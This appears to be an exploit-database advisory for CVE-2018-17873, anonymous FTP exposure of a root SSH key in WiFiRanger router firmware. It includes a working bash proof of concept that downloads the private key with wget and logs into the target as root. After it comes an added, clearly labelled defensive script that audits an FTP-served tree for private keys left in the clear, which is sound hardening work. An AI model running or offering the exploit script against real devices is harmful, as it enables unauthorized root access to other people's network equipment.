zdt / Mitchel Jordan / 1337DAY-ID-31370
Oct 22, 2018 - 12:00 a.m.

WiFiRanger 7.0.8rc3 Incorrect Access Control / Privilege Escalation Vulnerability

2018-10-22 00:00:00
Mitchel Jordan
0day.today

EPSS: 0.001 (Low), percentile 48.8%

WiFiRanger version 7.0.8rc3 suffers from incorrect access control: anonymous FTP access allows retrieval of an RSA private key (identity file) that an attacker can use to SSH in as root.

# Exploit Title: WiFiRanger 7.0.8rc3 Incorrect Access Control - Privilege Escalation (POC)
# Exploit Author: Mitchel Jordan
# Vendor Homepage: https://wifiranger.com/
# Firmware: Phantom 7.0.8rc3
# CVE: CVE-2018-17873

# Details:
# WiFiRanger indoor routers (Core, GoAC) and their outdoor paired routers (Sky Pro, EliteAC, EliteAC FM) running 
# firmware version 7.0.8rc3 and earlier allow anonymous FTP read/write access and have left the SSH Private Key
# in the clear - making it a trivial task to view/copy the key and log in with root privileges.
#
# Adjacent network access required to exploit this vulnerability.

# Exploit:
# Extremely simple shell script that grabs the private key and logs in as root.
#
# Usage: ./wifiRangerPwn.sh <WiFiRanger IP>

#!/bin/bash

wget "ftp://$1/sbc/aff/id_rsa"
chmod 600 id_rsa
ssh -i id_rsa root@$1

#  0day.today [2018-10-22]  #
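
For firmware reviewers: the root cause above is private-key material sitting inside a tree the FTP daemon serves. The following is an added example, not part of the original advisory or the vendor's code; it audits a local copy of such a tree (for instance an unpacked firmware image) and assumes paths contain no newlines. The function name and usage are hypothetical.

```shell
#!/bin/sh
# Added example: audit a directory tree that an FTP daemon serves for
# private-key material left in the clear.
# Usage (hypothetical script name): ./ftp_key_audit.sh /path/to/ftp-root

# Print "mode<TAB>path" for every regular file under $1 whose first line
# is a PEM or OpenSSH private-key header.
# Returns 0 if the tree is clean, 1 if keys were found, 2 on error.
find_exposed_keys() {
    root=$1
    [ -d "$root" ] || { echo "not a directory: $root" >&2; return 2; }
    found=0
    # A temp file carries find's output so the loop runs in this shell
    # and can update $found (a pipeline would run it in a subshell).
    list=$(mktemp) || return 2
    find "$root" -type f > "$list"
    while IFS= read -r f; do
        # Matches RSA, DSA, EC, OPENSSH, ENCRYPTED and bare PKCS#8 headers.
        if head -n 1 "$f" 2>/dev/null |
           grep -Eq '^-----BEGIN ([A-Z0-9]+ )?PRIVATE KEY-----'; then
            mode=$(ls -ld "$f" | cut -c1-10)
            printf '%s\t%s\n' "$mode" "$f"
            found=1
        fi
    done < "$list"
    rm -f "$list"
    return "$found"
}

# Run the audit only when a directory argument is supplied.
if [ "$#" -gt 0 ]; then
    find_exposed_keys "$1"
fi
```

A non-zero exit makes the check usable as a release gate: any hit means the key must be moved out of the served tree and rotated, since a key shipped in firmware is shared by every unit.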
